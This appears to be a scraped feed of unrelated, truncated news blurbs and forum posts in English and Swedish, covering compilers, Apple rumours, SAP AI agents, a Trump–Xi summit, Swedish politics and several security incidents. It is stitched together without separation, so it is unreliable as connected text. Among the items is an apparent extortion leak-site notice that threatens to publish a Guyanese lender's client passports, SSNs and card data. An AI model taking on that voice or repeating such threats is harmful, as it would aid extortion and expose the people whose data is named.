GCC 16.1 released at the end of April as the latest major, annual feature release to the GNU Compiler Collection. Early benchmarks showed some nice leads for GCC 16 over GCC 15. Continued testing of the new GCC 16 compiler has continued to show overall better performance of the resulting binaries than using GCC 15 on the same hardware and same compiler flags. That led many to wonder about the GCC 16 performance up against the latest LLVM/Clang open-source compiler, which is the focus of today's benchmarking showdown.

Efter förslaget om sänkt drivmedelsskatt får regeringen kritik från oppositionen.”Det är obegripligt i det här läget, jag skulle säga att det är hål i huvudet att sänka drivmedelsskatterna i en oljekris och när vi sitter fast i ett oljeberoende”, säger Miljöpartiets språkrör Daniel Helldén.”Än en gång verkar man ha totalt underskattat konsekvenserna för svensk ekonomi”, säger Mikael Damberg (S).

A BBC investigation exposed how scammers posted social content of dogs in distress to dupe donors into giving money.

While something new is always around the corner, now might be a particularly good time to hold off on buying a new iPhone if you are able to. The reason to consider waiting is that Apple is reportedly working on a special 20th-anniversary iPhone for release in September 2027, and rumors suggest that the device will feature the biggest redesign since the iPhone X in 2017. According to Bloomberg, the 20th-anniversary iPhone will have "glass edges that curve seamlessly into the display on all four sides." The Information reported that one of Apple's early 20th-anniversary iPhone prototypes lacked bezels around the screen. The device had only a "narrow metal band running around the midpoint of the device's edge, where the buttons sit." Apple has also aimed for the device to have no cutouts in the screen, according to The Information, but it is unclear if the company will be able to move both the front camera and the Face ID system under the screen by next year. Overall, it sounds like Apple has ambitious goals with the 20th-anniversary iPhone, and that makes it a device that might be especially worth waiting for. Of course, this advice will not apply to you if you upgrade your iPhone every single year regardless, but the average customer holds on to their iPhone for two to four years. In the meantime, Apple is expected to release the iPhone 18 Pro, iPhone 18 Pro Max, and its first-ever foldable iPhone in September 2026, followed by an iPhone 18, iPhone 18e, and a second-generation iPhone Air around March 2027.Tag: 20th-Anniversary iPhoneThis article, "You Might Want to Wait to Buy a New iPhone" first appeared on MacRumors.comDiscuss this article in our forums

This webinar will help OT security teams and asset owners stop being cost centers and start being resilience drivers. The post Webinar Today: ROI for Cyber-Physical Security Programs appeared first on SecurityWeek.

Vill du se fotbolls-VM tillsammans med andra? På flera håll i Stockholms län planeras visningar av matcherna på storbildsskärm – både i stadsmiljö och på restauranger och barer. Här är guiden till var du kan se matcherna i sommar.

May 19 launch will put redesigned rocket, pad, and engines through their paces

Poppy is an AI-powered app that connects your calendar, email, messages, and other services to surface reminders, suggestions, and tasks based on what’s happening in your life.

With the Switch 2 getting a price hike in September, this holiday season will be pivotal for Nintendo. That increased cost means that the company will rely heavily on new games to sell its current console - but as of right now the lineup for the second half of the year is sparse. However, without […]

US Defence Secretary Pete Hegseth’s rare presence in President Donald Trump’s entourage to Beijing signals a willingness on both sides to strengthen military communications to de-escalate and avoid crises, and suggests US arms sales to Taiwan will feature in talks, analysts say. The Chinese experts expected Beijing to include Defence Minister Dong Jun in talks during the summit, with one source suggesting that Dong and Hegseth might also hold separate negotiations on the sidelines of the...

Vid Sapphire 2026 presenterade SAP det man kallar ”Autonomous Enterprise”: en omfattande vision där AI-agenter inte bara bistår medarbetarna, utan själva utför affärsprocesser. – Vi bygger inget mindre än ett nytt SAP, sa vd Christian Klein till deltagarna i Orlando, Florida. Företaget, sade han, är på väg att ”bli ett företag inom affärs-AI”. Kärnan är SAP Autonomous Suite, som använder mer än 50 domänspecifika SAP Joule AI-assistenter inom ekonomi, leveranskedja, inköp, HR och kundengagemang. Dessa assistenter samordnar en grupp på över 200 specialiserade agenter för att utföra uppgifter från början till slut, från att komprimera bokslutet till att automatisera ombalanseringen av leveranskedjan. Klein betonade att AI för företag kräver precision. – Om AI sköter löneutbetalningar, bokslut eller planering av leveranskedjan är 80 procent noggrannhet inte tillräckligt, sa han. En ny plattform och ett nytt gränssnitt Grunden för sviten är SAP:s nya Business AI Platform, som förenar SAP:s Business Technology Platform, Business Data Cloud och AI-funktioner i en enda styrd miljö. Kärnan är vad SAP kallar ”företagsminne”, en kontextgraf som förser agenterna med policyer, procedurer, Slack-konversationer och e-postgodkännandekedjor så att de vet vad de ska göra och, framför allt, vad de inte ska göra. – När det uppstår ett undantag läggs det till i företagsminnet och alla agenter anpassar sig omedelbart, sa Muhammad Alam, styrelseledamot med ansvar för produktutveckling. SAP introducerade också Joule Work, som fundamentalt förändrar hur användare interagerar med SAP-programvara. Istället för att navigera i applikationer och mata in data på olika skärmar beskriver användarna ett önskat resultat, och Joule koordinerar arbetsflöden, data och agenter för att få det gjort. För utvecklare lanserade SAP Joule Studio 2.0, som är tillgängligt gratis fram till årsskiftet, vilket låter dem bygga agenter med Python, Claude Code eller Cursor och distribuera dem till en hanterad runtime. AI Agent Hub, som lanseras under tredje kvartalet utan extra kostnad, erbjuder en enda plats för att upptäcka, hantera och styra agenter i både SAP- och icke-SAP-system. Partner och bevis SAP bjöd in viktiga partner på scenen och på skärmen för att understryka sina AI-ambitioner. I videoklipp sa Anthropics president Daniela Amodei att Claude-modeller driver Joule-agenter inom ekonomi, inköp och leveranskedjan, och Nvidias vd Jensen Huang diskuterade öppna agentprotokoll som gör det möjligt för AI att agera säkert inom företag. Jeremy Barnum, cfo på JP Morgan Chase, sa att banken uppgraderar sin huvudbok till SAP:s enhetliga plattform och utforskar agentfunktioner för kassahantering. – Man kan inte realisera AI:s fulla potential i en äldre miljö, sa han. Ett antal kunder har redan tagit systemet i drift. Enligt Rob Fisher, KPMG:s globala rådgivningschef, har företaget till exempel implementerat Joule för 270 000 användare, där 3 000 konsulter använder 20 agenter, och företaget siktar på att minska kontraktsläckaget med 120 miljoner dollar. Dessutom rapporterade Ericsson att man sparat 90 000 timmar genom att använda personanpassade AI-rekommendationer för sina 85 000 anställda. Bayer använder assistenter för kontantinkassering; Novartis har implementerat inköpsagenter för stora volymer; och H&M har demonstrerat ett butiksinformationssystem som levererar prestationsdata i realtid och AI-drivna rekommendationer till butikschefer. Tänk på avståndet Ändå släpar införandet efter ambitionerna. Maribel Lopez, grundare av Lopez Research, säger att företagen inte implementerar det som redan finns tillgängligt. – SAP-kunder är mycket försiktiga eftersom SAP-arbetsbelastningarna är centrala för driften av verksamheten, säger hon. Mickey North Rizza, chef för företagsprogramvara på analysföretaget IDC, är mer optimistisk. – För närvarande används 73 procent av AI-agenterna och -assistenterna ofta och ger besparingar på 30 till 90 minuter per dag, säger hon. – SAP:s AI-vision är en ledstjärna för deras kunder att framgångsrikt ta sig in i AI-världen. SAP:s Alam tillade att kunderna har blivit otåliga med företagets AI-löften och har ställt honom till svars. Med hänvisning till assistenten för bokslut krävde en kund: ”Finns den verkligen? Om det dröjer tre månader ska jag bygga den själv.” Det skapar en ny känsla av brådska, sade Alam. Lita på, men verifiera SAP har gjort styrning till ett centralt fokus, påpekade Alam. Företaget har byggt in SOX-revisorkompatibilitet i sitt ramverk för att säkerställa revisionsberedskap på agentnivå, och varje åtgärd loggas och är spårbar. Men Jonathan von Rüeden, SAP:s AI-chef, medgav att kunderna har olika nivåer av trygghet med autonomi, beroende på processen. – I en bokslutsprocess kommer finansdirektören att vilja ta en titt när böckerna stängs. Men folk känner sig mer trygga med autonoma periodiseringar. SAP prioriterar också interoperabilitet. Agenter som byggs i Joule Studio kommer att stödja A2A-protokollet för att ansluta till tredjepartsagenter, och SAP:s orkestreringslager kommer att styra icke-SAP-agenter utan extra kostnad. Vägen till autonomi För att påskynda införandet har SAP uppdaterat sina erbjudanden. RISE with SAP-kunder får tre Joule-assistenter aktiverade under sitt första år, medan GROW with SAP-kunder får tillgång till hela agentportföljen vid onboarding. Agentledda transformationsverktyg kan minska migreringsarbetet med cirka 35 procent, enligt SAP. – Men just nu behöver kunderna inte tusentals agenter; de behöver få agentbaserad AI igång med en uppsättning säkra, styrda agenter som hjälper dem att hantera specifika användningsfall, säger Lopez. – Kunderna måste fråga sig vad visionen är, koppla den till sina behov och sedan planera resan.

Den ökända malwaregruppen TeamPCP tycks ha publicerat källkoden till sin Shai-Hulud-mask öppet på Github, rapporterar The Register. Säkerhetsföretaget Ox upptäckte två publika kodarkiv där gruppen själva beskriver projektet som öppen källkod. Shai-Hulud är en självspridande mask som angriper NPM-paket och försöker stjäla inloggningsuppgifter till tjänster som AWS, Github, Azure och Google Cloud. Om den lyckas kan den automatiskt infektera fler projekt genom att publicera manipulerade paket vidare i utvecklarnas leveranskedjor. I vissa fall försöker skadeprogrammet även radera den lokala miljön om attacken misslyckas. Enligt Ox har andra angripare redan börjat forka och modifiera koden på GitHub för egna versioner av masken. Vid tillfället för rapporteringen hade arkiven funnits tillgängliga i tolv timmar utan att Github tagit bort dem.

The Institute of Private Enterprise Development focuses on improving the livelihoods of micro a nd small entrepreneurs by offering loans ranging from $40,000 to $7,500,000 GYD. Their services are designed to support individuals looking to start or grow their businesses, with a signific ant emphasis on female and youth entrepreneurs, as well as those in rural areas. We will upload 55gb of corporate data soon. Detailed clients and employee personal information (passports, DLs, SSNs, ID cards, financial information, credit card details and so on), NDAs , etc.

Flera stora Hollywoodprofiler, som George Clooney, Tom Hanks och Meryl Streep, ställer sig bakom den nya AI-standarden “Human Consent Standard”, rapporterar The Verge. Bakom initiativet står även organisationer som Creative Artists Agency samt skådespelerskan Cate Blanchett, som beskriver systemet som ett sätt för både kändisar och vanliga människor att skydda sina rättigheter i AI-eran. Standarden gör det möjligt för användare att ange om AI-företag får använda deras material fritt, endast under vissa villkor eller inte alls. Syftet är att ge människor större kontroll över hur AI-system får använda deras ansikten, röster, karaktärer och kreativa verk. Systemet bygger vidare på “Really Simple Licensing”-standarden och använder signaler via robots.txt-filer för att kommunicera reglerna till AI-botar. I juni lanseras även ett register som AI-system kan kontrollera och där både kreatörer och privatpersoner ska kunna verifiera sin identitet och ange sina AI-villkor.

Sydkoreas regering överväger en slags “folkutdelning” där delar av de enorma vinsterna från landets halvledar- och AI-industri skulle kunna omfördelas till allmänheten, rapporterar Nikkei Asia. Förslaget kommer från president Lee Jae Myungs policychef, Kim Yong-beom, som varnar för att AI-ekonomin riskerar att skapa stora klyftor. Enligt honom kommer AI- och chippföretag att samla på sig mycket stora vinster samtidigt som medelklassen och personer utan AI-kompetens riskerar att halka efter. Regeringen har ännu inte presenterat exakt hur en sådan utdelning skulle fungera i praktiken. En variant är att en del av vinsterna ska användas för satsningar som exempelvis stöd till unga entreprenörer, landsbygden, konstnärer, pensionärer och AI-utbildning. Enligt Kim Yong-beom står Sydkorea nu inför ett vägval. Att fortsätta som en traditionell exportberoende ekonomi som svänger med värdskonjukturen, eller utvecklas till en ny typ av AI-driven industristat.

We’re seeing a lot of alerts getting triggered by normal application behavior that looks suspicious in isolation but isn’t actually an incident. Here is an ex. pattern we keep running into: A service logs repeated warnings like: “request retrying due to upstream delay” This gets picked up by an alert rule that matches on retry + error pattern, even though in this case its expected behavior during brief latency spikes. What ends up happening is the same rule catches both real incidents (service failures) and normal transient conditions, depending on timing and context What Ive tried: tightening regex paterns, but this starts missing real failures that look similar increasing thresholds (for ex. number of occurrences), but that delays detection too much splitting alerts per service, but noise still appears at service boundaries adding exclusions for known patterns, but this becomes hard to maintain over time I’m aware we could disable or heavily narrow rules, but that feels like trading false positives for blind spots rather than solving the issue. What I havent figured out yet is whether there’s a common approach for adding context to log based alerting. Right now each log line is evaluated independently, but most of the false positives seem to come from not considering surrounding events or sequences. Is there a standard way teams reduce false positives in log alerting without relying purely on stricter regex or threshold tuning? any advice is appreciated, thanks! submitted by /u/Iwanttoberich_8671 [link] [comments]

The European Union will not ban “conversion therapy” targeting LGBTQ people, but will push member states to take action against such practices, it said on Wednesday. So-called conversion “therapies” involve methods that seek to change the sexual orientation or gender identity or expression of members of gay, lesbian, queer and trans people. The EU stopped short of heeding a call by over a million people, who signed a petition last May calling on the 27-country bloc to prohibit such...

Vänersborgs tingsrätt dömer en 68-årig man till tre års fängelse efter att en kvinna i 45-årsåldern hittades död i Vänersborgs kommun.

Flera skott avlossades och kaos utbröt vid den filippinska senaten i Manila på onsdagen. Detta i samband med att senatorn Ronald dela Rosa, som är efterlyst av Internationella brottmålsdomstolen, skulle gripas.

Cinematographer Hillary Fyfe Spera on how she kept things visually fresh for Born Again’s second season.

Insändare: Långsiktighet stärker Alingsås attraktionskraft Alingsås Tidning

Kinesiska USA-kännare tror inte på stora genombrott inför USA:s president Donald Trumps besök i Peking. Målet för båda sidor är att behålla lugn i relationen, menar de. Men de ser olika på hur stark förhandlingsposition Kina har.Kina kommer inte att lyckas få av USA några betydande eller långsiktiga fördelar varken vad gäller ekonomi eller teknologi, bedömer Shi Yinhong, professor i internationella relationer vid Renminuniversitetet i Peking.Wang Yue Sheng, ekonomiprofessor vid Pekinguniversitetet, säger tvärtom att Peking har en starkare hand när förhandlingarna startar.

Public concern has only grown, says ICB, while evidence of benefits remains thin

Rådjur på fel sida av viltstängslet på E20 Alingsås Tidning

Han kallade sig Jennifer och utgav sig för att vara en 16-årig flicka. För drygt två år sedan dömdes han till sex års fängelse för brott mot nio barn. Nu döms han i Jönköpings tingsrätt för liknande brott mot ytterligare 44 barn.

Skott har avlossats i Filippinernas senatsbyggnad i Manila, där tidigare polischefen Ronald de la Rosa sökt skydd undan hot om gripande och utlämning till ICC i Haag.De la Rosa misstänks för brott mot mänskligheten under före detta presidenten Rodrigo Dutertes narkotikakampanj, då han anklagas för minst 32 dödsfall samtidigt som människorättsgrupper talar om tusentals dödade.I ett videoklipp hörs skotten medan journalister flyr i panik och senatens ordförande säger att byggnaden är under attack.

Trump has landed in Beijing for the first visit by a US leader since his own in 2017.

A threat actor with affiliations to China has been linked to a "multi-wave intrusion" targeting an unnamed Azerbaijani oil and gas company between late December 2025 and late February 2026, marking an expansion of its targeting. The activity has been attributed by Bitdefender with moderate-to-high confidence to a hacking group known as FamousSparrow (aka UAT-9244), which shares some level of

In the latest evolution of automated cyberattacks, two threat campaigns heavily leveraged AI agents to support attacks against entities in Mexico and Brazil.

The cyberthreat group targets an Azerbaijani oil and gas firm with repeated attacks, as the China-linked actors extend targeting beyond hospitality, telecom, and government sectors.

Cloud-powered undo will roll back dodgy code without users or hardware partners lifting a finger

Hi All, In all my years, this is something I’ve never hit up against so looking for some general guidance. Recently migrated a website to new hosting provider. Since doing so, access to the website from China is not working. Hosting provider confirmed no geo blocking in place. Can ping and tracert to the website IP address from China IPs, but unable to access the site over HTTPS. Colleagues in China suggest it must be the China government firewall, which it certainly seems to be. Guess we were lucky that the previous hosting IP wasn’t blocked. What approaches are available to address this? They’ve suggested reverse proxy in Hong Kong, but not sure of the technical (or legal) implications of something like that. Thanks! submitted by /u/greenstarthree [link] [comments]

A Hong Kong court has remanded a former university professor in custody pending sentencing for accepting a HK$40,000 (US$5,109) bribe and offering red packets to two colleagues to help a student gain admission to a postgraduate programme last year. Kwun Tong Court heard on Wednesday that Liu Hongbin, 63, abused his authority as chair professor of the ocean science department at the Hong Kong University of Science and Technology (HKUST) to help a mainland Chinese student majoring in automotive...

Gorey Community School is a co-educational, multi-denominational institution located in Gorey, Co. Wexford, under the joint patronage of the Loreto Sisters and Waterford and Wexford ETB

These websites represent a synergistic group of Malaysian companies, such as AME Elite and TSK Synergy, specializing in integrated industrial construction and engineering solutions. They provide end-to-end services, including the design and fabrication of steel structures, mechanical engineering, and the development of large-scale industrial parks. Together, they leverage their combined expertise to deliver "turnkey" manufacturing facilities and infrastructure projects across the region.

Article URL: https://jorijn.com/en/blog/leaving-github-for-forgejo/ Comments URL: https://news.ycombinator.com/item?id=48121266 Points: 411 # Comments: 221

Rådjur på vägen kan skapa fara på E20 Alingsås Tidning

Foxconn, the world's largest electronics manufacturer, says some of its North American factories are now working to resume normal operations after a cyberattack. [...]

French authorities on Wednesday confined more than 1,700 passengers and crew on a British cruise ship docked in Bordeaux after an elderly passenger died, said officials, who played down any links to the hantavirus scare. Dozens also suffered from upset stomachs aboard the Ambition – most of whose 1,233 passengers are from Britain or Ireland – which arrived in the western port of Bordeaux on Tuesday, with 514 Indian crew members also on board. But health officials said there was no connection...

The Rivian Assistant is available for both Gen1 and Gen2 hardware.

The watchdog says it is opening a case into The Anti-Slavery Collective to assess concerns over spending.

Sänkt skatt på bensin och diesel. Det är en del av det krispaket som regeringen presenterade under onsdagen. Positivt enligt Katarina Wolf, ordförande i LRF Ungdomen och lantbrukare utanför Rimforsa. Men hon betonar att det krävs mer för att hantera återkommande kriser.

Attackers can compromise systems in minutes while patching and response still take hours or days. Picus Security breaks down why autonomous validation is becoming critical for modern defense strategies. [...]

Summer hit South Asia early this year. April saw above average temperatures and the mercury is expected to reach unbearable highs this month. We are also bracing for a “super El Nino”, where a combination of increased heatwaves and highly variable weather patterns are expected to push urban zones, agricultural systems and public health to their limits. South Asia, especially parts of Pakistan, India and Nepal, is likely to receive below average monsoon rainfall during the summer months of...

En man i 60-årsåldern har häktats misstänkt för ett mord i en villa i Hällby utanför Eskilstuna natten till söndagen.

Gunshots broke out at the Philippine Senate on Wednesday and people ran for cover after a top politician wanted by the International Criminal Court said his arrest was imminent and security forces entered the building. There were no immediate reports of casualties, however, Senate Secretary Mark Llandro Mendoza told reporters following the chaos at the legislature in the capital Manila. Senator Ronald dela Rosa, a former police chief who was the main enforcer of former Philippine president...

Tillverkningen av östrogenmediciner går för långsamt för att möta den ökande efterfrågan bland kvinnor med klimakteriebesvär. Nu gapar hyllorna tomma på många platser i Sverige. – Jag blir trött, förbannad och ledsen, säger Anna Sahlin, vars hjärntrötthet och sömnbrist lindrats tack vare östrogentillskotten.

Croydon trial helped secure 173 arrests, though civil liberties groups remain unconvinced

Nya filmer av den spanske filmnestorn Pedro Almodóvar, polska ”Ida”-regissören Paweł Pawlikovski och iranska Asghar Farhadi. Få koll på vilka som har chans att vinna filmvärldens finaste pris: Guldpalmen.

The Committee on Homeland Security has requested to be briefed on the incident and Instructure’s remediation steps. The post Government to Scrutinize Instructure Over Canvas Disruption, Data Breach appeared first on SecurityWeek.

Adaption's new AutoScientist tool is designed to let models adapt to specific capabilities quickly through an automated approach to conventional fine-tuning.

Det ska bli stopp för nystartade friskolor att ta ut vinst de första fem åren, enligt ett förslag från regeringen och Sverigedemokraterna. Tidöpartierna kallar det för ett värdeöverföringsförbud.Ett förbud mot vinstutdelning ska också gälla i tre år vid en förändring av ägarstrukturen och i två år om skolan har kvalitetsbrister. En friskola som bryter mot förbudet kan tvingas att böta. Dagens förslag innebär inte något totalt för vinstförbud för friskolor.

Asian migrant workers in the Gulf are testing stablecoins as a backup channel for sending money home, as the Iran war heightens fears that the risk of US sanctions could disrupt remittances that millions of families and several Asian economies rely on. Remittances from these workers account for 3 per cent to 5 per cent of gross domestic product in several emerging markets – in Nepal, it is as high as 10 per cent, according to data from the Global Settlement Network. Concerns over remittance...

Det kan bli problem för den som ger sig ut i tågtrafiken under Kristi himmelsfärd, då Trafikverket stänger av flera sträckor för arbeten. ”Man kommer jobba dygnet runt”, säger Felicia Danielsson, presskommunikatör hos Trafikverket. SJ har lett om resor söderut från Södertälje via Västerås och Örebro, säger presstalesperson Anders Edgren.

Article URL: https://www.ycombinator.com/companies/substrate/jobs/T2fMBhD-technical-success-manager Comments URL: https://news.ycombinator.com/item?id=48120776 Points: 0 # Comments: 0

The Dutch government has objected to a proposed US law that would further restrict semiconductor equipment giant ASML from selling to China and servicing customers in the country. The Dutch company, the global market leader in the lithographic technology used to laser-print tiny circuits onto microchips, has seen its access to the Chinese market severely hampered by US sanctions. Now, as US lawmakers look to further choke the European outfit off from the Chinese market, The Hague has lodged an...

Nearly 1,000 climbers will attempt to scale the peak in coming weeks and this has raised safety concerns.

Microsoft says some customers are experiencing issues downloading and installing Office on their Windows 365 devices. [...]

Keir Starmer faced his biggest challenge yet on Wednesday when his health minister was reported to be readying his resignation to try to trigger a contest to replace a British prime minister who had sought some respite to set out his government’s agenda. As Starmer and his ministers stood in silence to hear King Charles read out their government’s agenda, the ceremony was overshadowed by what could be the most dangerous threat to the prime minister since lawmakers began urging him to resign over...

TL;DR: Stop chasing thousands of "toast" alerts. Join experts from Wiz to learn how hackers connect tiny flaws to build a "Lethal Chain" to your data—and how to break it. Register for the Strategic Briefing Here. Most security tools work like a smoke alarm that goes off every time you burn a piece of toast. You get so many alerts that you eventually start to ignore them. The real danger? While

Donald Trump har landat i Kina för möten med sin motpart Xi Jinping. Det är första gången en amerikansk president besöker landet på nästan ett årtionde. – Stora delar av Peking är förberett för Trumps entré i stan. Han kommer att färdas från flygplatsen till ett hotell i den nordöstra delen av Peking, säger Stefan Åsberg, SVT:s Asienkorrespondent på plats.

The authority managing Hong Kong International Airport has taken over the retail operations of 11 Skies from New World Development ahead of the opening of Terminal 2, the South China Morning Post has learned. Multiple sources said the Airport Authority had assumed control of key components of the 2.66 million sq ft retail and dining space, representing 70 per cent of the entire project. But it remains unclear whether the authority has also taken over the rest of 570,000 sq ft of experiential...

Displaced teenagers Farah and Tala wanted to 'turn destruction into something useful'.

Article URL: https://monokai.com/articles/how-i-moved-my-digital-stack-to-europe/ Comments URL: https://news.ycombinator.com/item?id=48120629 Points: 695 # Comments: 461

Regeringen lägger fram ett krispaket på 17,5 miljarder kronor på grund av den globala energikrisen.Bland annat föreslås sänkt skatt på bensin och diesel från 1 juli.Ekots politikkommentator Fredrik Furtenbach: ”En tanke med det här är att hålla konjunkturen under armarna”.

This live article is freely available to our registered users. Please log in or create an account below. Unrivalled Xi-Trump summit analysis: get real-time updates and exclusive boots-on-the-ground reporting from our Beijing and Washington bureaus. Subscribe now with great savings to stay ahead. US President Donald Trump has arrived at Beijing Capital International Airport for talks with Chinese President Xi Jinping. The state visit is the first by an American president in almost nine years. It...

Security teams have never had better visibility into their environments and never been worse at confirming what they fix stays fixed. Mandiant's M-Trends 2026 report puts the mean time to exploit at an estimated negative seven days. The Verizon 2025 DBIR puts median time to remediate edge device vulnerabilities at 32 days. These numbers have understandably driven the industry toward a clear

Further demonstrating its role as industry default OS the versatility of modern porting tools

A court in Bremen has found the manufacturer of the classic Alpine Milk chocolate bar guilty of "shrinkflation".

Bitlocker bypass anyone? GitHub - Nightmare-Eclipse/YellowKey: YellowKey Bitlocker Bypass Vulnerability · GitHub submitted by /u/MegaN00BMan [link] [comments]

Two former prison guards discuss the long-term trauma of a career working with Northern Ireland's most dangerous criminals.

Regeringen och Sverigedemokraterna vill införa vinststopp för nya skolor, skolor med nya ägare och skolor som fälls för kvalitetsbrister. Enligt förslaget ska det också bli lättare att stänga friskolor när allvarliga missförhållanden upptäcks. – Över 30 år av oreglerade vinstuttag upphör nu. Pengarna ska stanna i verksamheten, säger utbildningsminister Simona Mohamsson (L) på en pressträff.

The telehealth platform was hacked in January, and users’ personal information was exfiltrated from its systems. The post 716,000 Impacted by OpenLoop Health Data Breach appeared first on SecurityWeek.

Polisen misstänker att en stöldliga opererar i Jämtland och Härjedalen. På kort tid har flera fyrhjulingsstölder rapporterats in. I Offerdal, Bruksvallarna och Mittådalen. Samma modell av fyrhjuling har försvunnit på två av platserna.

Omkring 1 700 personer sitter fast på ett kryssningsfartyg i hamnen i franska Bordeaux sedan norovirus, som orsakar vinterkräksjuka, upptäckts ombord.

Det väntas regn, blåst och kalla temperaturer under långhelgen.I södra Norrland och delar av Svealand kan det komma upp till 20-30 millimeter nederbörd.”Nästa vecka ser det ut som att den lite varmare luften får göra en återkomst till Sverige”, säger Fanny Saarela meteorolog på SMHI.

Under tisdagen visade Google upp Googlebook, en ny serie bärbara datorer som är tänkt att ersätta Chromebook på sikt. Googlebook använder sig av Googles nya operativsystem som är en sorts kombination av Android och Chrome OS. Det innebär bland annat att det blir möjligt att köra miljontals mobil-appar rakt av. I övrigt är det stora dragplåstret Gemini Intelligence, Googles samling av AI-verktyg som ska hjälpa oss med mer eller mindre allt vi vill göra med våra datorer. Eftersom Gemini har full koll på det som syns på skärmen kan AI-verktyget föreslå lämpliga åtgärder för dina filer eller samla in data från dina appar. För att starta Gemini räcker det med att skaka på muspekaren, en funktion som kallas för Magic Pointer. Precis som med Chromebook kommer det att finnas Googlebook-modeller från Googles samarbetspartners, vilket inkluderar Acer, Asus, Dell, HP och Lenovo. De första datorerna kommer börja säljas till hösten, rapporterar Ars Technica.

A cyberattack campaign that tricks users into running malicious commands on their own computers has taken a dangerous new turn. The technique, known as “ClickFix,” has been circulating for some time, but a recent incident revealed that attackers are now pairing it with a 10-year-old open-source Python tool to create a far more resilient form […] The post ClickFix Evolves with 10-Year-Old Open-Source Python SOCKS5 Proxy appeared first on Cyber Security News.

En av nyheterna i Android 17 är Pause Point, en ny funktion som gör det möjligt att få en automatisk paus på tio sekunder när du öppnar beroendeframkallande appar som Tiktok, Instagram eller Youtube. Syftet med Pause Point är att minska risken för att användarna fastnar framför sina skärmar, ett fenomen som kallas för ”doomscrolling”. Under den tio sekunder långa pausen kan du nämligen bestämma dig för att göra något annat med mobilen, till exempel läsa en e-bok eller lyssna på en ljudbok. Alternativt kan du förstås välja att strunta i mobilen och ta en skogspromenad eller träffa kompisar. För att stänga av Pause Point behöver du starta om mobilen, vilket ska se till att du tänker dig för innan du avaktiverar funktionen.

På sistone har amerikanska, tyska och nederländska myndigheter varnat för en våg av falska supportmeddelanden i appen Signal. I själva verket handlar det om nätfiskekampanjer där förövarna är ute efter att lägga vantarna på våra konton, chattar och kontakter, rapporterar Bleeping Computer. Nu har Signal valt att lägga till tydliga varningar i appen med uppmaningen att aldrig svara på meddelanden som påstås komma från supportavdelningen. När någon försöker ta kontakt med dig kommer det dessutom stå ”Name not verified” eller ”No groups in common” om det rör sig om en okänd person. Dessutom lyfts fram att Signal aldrig frågar efter registreringskoder, pinkoder eller återställningsnycklar, så alla sådana förfrågningar är att betrakta som lurendrejeriförsök.

The UK’s AI Security Institute evaluated GPT-5.5’s ability to find security vulnerabilities, and found that it is comparable to Claude Mythos. Note that the OpenAI model is generally available. Here is the Institute’s evaluation of Mythos. And here is an analysis of a smaller, cheaper model. It requires more scaffolding from the prompter, but it is also just as good.

Article URL: https://atalaykutlay.com/or-tools-cp-sat-for-scheduling-problems.html Comments URL: https://news.ycombinator.com/item?id=48120351 Points: 60 # Comments: 22

Intel on Tuesday released a new version of their open-source Compute Runtime for OpenCL and Level Zero support across their integrated and discrete graphics hardware...

Ancient Slashdot reader ewhac writes: CERN, a longtime Open Source pioneer, has made several contributions over the years to KiCad ("KEE-kad"), an Open Source EDA (Electronic Design Automation) package widely used in the hobbyist and professional electronics communities. It's gotten so widely used that users can now submit their KiCad design files directly to several electronics fabricators (rather than the traditional step of converting the layouts to Gerber files). Over the years, CERN has also developed their own symbol and footprint libraries to support their own internal electronic designs. Last week, CERN released those KiCad component libraries, containing over 17,000 symbols, under the CERN Open Hardware License. Read more of this story at Slashdot.

Kommissionen vill att det ska bli lika enkelt att åka tåg som att flyga. Tågresenärer ska kunna boka paketresor med flera olika bolag, istället för att som idag pussla ihop en egen resa. Resenärernas återbetalningsskydd ska stärkas vid försenade eller inställda avgångar.Förslaget skickas nu över till parlamentet och EU-länderna som ska enas. Andreas Liljeheden, Sveriges Radios Brysselkorrespondent, tror att det blir en långdragen process.

Action on Salt & Sugar said people should not be exposed to a "hidden health risk every time they buy lunch".

När en 12-årig flicka och en 17-årig pojke under hösten 2025 försöker detonera handgranater i Borås gör de det på uppdrag av en och samme av Foxtrot-topp, Ali Namdar. – Genom sociala medier och krypterade chattar är det inte så svårt att rekrytera unga, säger Joakim Hellström, områdespolis i Borås.

Hello, I'm new to the Entreprise Apps managment. I would like to know the main difference between the SAML-based sign-on certificate (found under Enterprise Applications) and the certificate found under App Registrations. Thanks! submitted by /u/ibteea [link] [comments]

Toppmötet i Peking har höga insatser, men förhoppningarna om ett genombrott i de långvariga motsättningarna mellan Kina och USA är små. Däremot finns ett visst hopp om att Kina kan ge USA tillräckligt stöd för att bidra till att dämpa krisen i Mellanöstern.

Efter renoveringen – nu har Asian fusion slagit upp dörrarna Alingsås Tidning

As the early summer season approaches after weeks of heavy rain, reports of “flying ants” have emerged across Hong Kong, sparking concerns that the insects could cause a nuisance and even damage homes. Social media users also shared photos of the insects circling street lights in the evening or of their carcasses scattered across toilet sinks, with some questioning whether they are in fact termites. The South China Morning Post looks into these flying insects and how to prevent termites from...

The actor was recognised for his contributions to entertainment as well as his humanitarian efforts.

Havsspyan breder ut sig på havsbotten. För att stoppa spridningen kräver Transportstyrelsen nu insatser mot den invasiva arten – som berör båtägare.

In the hours before Donald Trump’s arrival in Beijing to begin his state visit, an unexpected detail caught the internet’s attention: US Secretary of State Marco Rubio’s choice of travel attire. Instead of the tailored formalwear typically expected of a top diplomat, Rubio appeared in a grey Nike tracksuit on the Beijing-bound Air Force One – an ensemble social media users quickly recognised as the “Maduro arrest look”. White House communications director Steven Cheung posted a photo of the top...

Tesla China has launched a new financing scheme to attract more budget-conscious buyers after its sales in the world’s largest electric vehicle (EV) market fell behind its domestic rivals. The US carmaker said on Wednesday that the down payment for a Shanghai-made Model 3 vehicle – priced at 235,500 yuan (US$34,672) – would be slashed to 55,900 yuan from 79,900 yuan if the buyer chose a five-year car loan offered by Tesla. “Our strong products, combined with attractive incentives for car...

Blog post mourning decline appears to have helped knock what was left of the veteran app's online presence offline

Facing scrutiny and persistent questions over its track record in artificial intelligence, Tencent Holdings’ co-founder and CEO Pony Ma Huateng offered this candid assessment to shareholders on Wednesday: “A year ago we thought we were on the boat, then we found it was leaking.” Speaking at the firm’s annual general meeting at the Four Seasons Hotel in Hong Kong, Ma signalled the beginnings of a turnaround, saying that the company had finally found its footing but was “not yet seated”, according...

Microsoft on Tuesday released patches for 138 security vulnerabilities spanning its product portfolio, although none of them have been listed as publicly known or under active attack. Of the 138 flaws, 30 are rated Critical, 104 are rated Important, three are rated Moderate, and one is rated Low in severity. As many as 61 vulnerabilities are classified as privilege escalation bugs, followed by

